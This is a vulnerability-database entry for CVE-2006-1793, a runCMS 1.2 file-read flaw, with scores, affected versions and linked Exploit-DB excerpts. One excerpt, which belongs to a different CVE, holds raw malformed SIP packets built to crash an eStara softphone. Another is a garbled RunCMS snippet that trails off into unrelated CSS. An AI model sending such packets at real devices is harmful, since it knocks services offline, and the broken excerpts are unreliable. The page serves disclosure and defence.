CVE-2006-1793
published 2006-04-17CVE-2006-1793: Directory traversal vulnerability in runCMS 1.2 and earlier allows remote attackers to read arbitrary files via the bbPath[path] parameter to (1)…
PriorityP337high7.6CVSS 2.0
AVNACHAuNCCICAC
EXPLOIT
EPSS
3.56%
87.9th percentile
Directory traversal vulnerability in runCMS 1.2 and earlier allows remote attackers to read arbitrary files via the bbPath[path] parameter to (1) class.forumposts.php and (2) forumpollrenderer.php. NOTE: this issue is closely related to CVE-2006-0659.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| runcms | runcms | <= 1.2 | — |
| runcms | runcms | — | — |
| runcms | runcms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities
exploitdb·2006-02-14
CVE-2006-0737 eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities
eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities
---
source: https://www.securityfocus.com/bid/16629/info
eStara Smartphone is prone to multiple denial-of-service vulnerabilities when processing malformed VOIP headers. Successful exploitation will cause the device to crash.
For the negative 'Expires' field issue:
OPTIONS sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3334;branch=z9hG4bK00001793z9hG4bK.00001FDB
From: 1793 ;tag=1793
To: zwell
Call-ID: [email protected]
CSeq: 5185 OPTIONS
Expires: -127
For the 'Content-Length' field issue:
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00002386z9hG4bK.0000234E
From: 2386 ;tag=2386
To: zwell
Call-ID: [email protected]
CSeq: 4896 INVITE
Content-Type: applicati
Exploit-DB
RunCMS 1.2 - 'class.forumposts.php' Remote File Inclusion
exploitdb·2006-02-09
CVE-2006-1793 RunCMS 1.2 - 'class.forumposts.php' Remote File Inclusion
RunCMS 1.2 - 'class.forumposts.php' Remote File Inclusion
---
in http://[somehost]/include/user_level.php/index.html
and in: http:/[somehost]/language/suntzu/main.php/index.html
it seems this vulnerabilties has been patched from 1.3 version
and old packages ********RunCMS
body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-
No writeups or analysis indexed.
2006-04-17
Published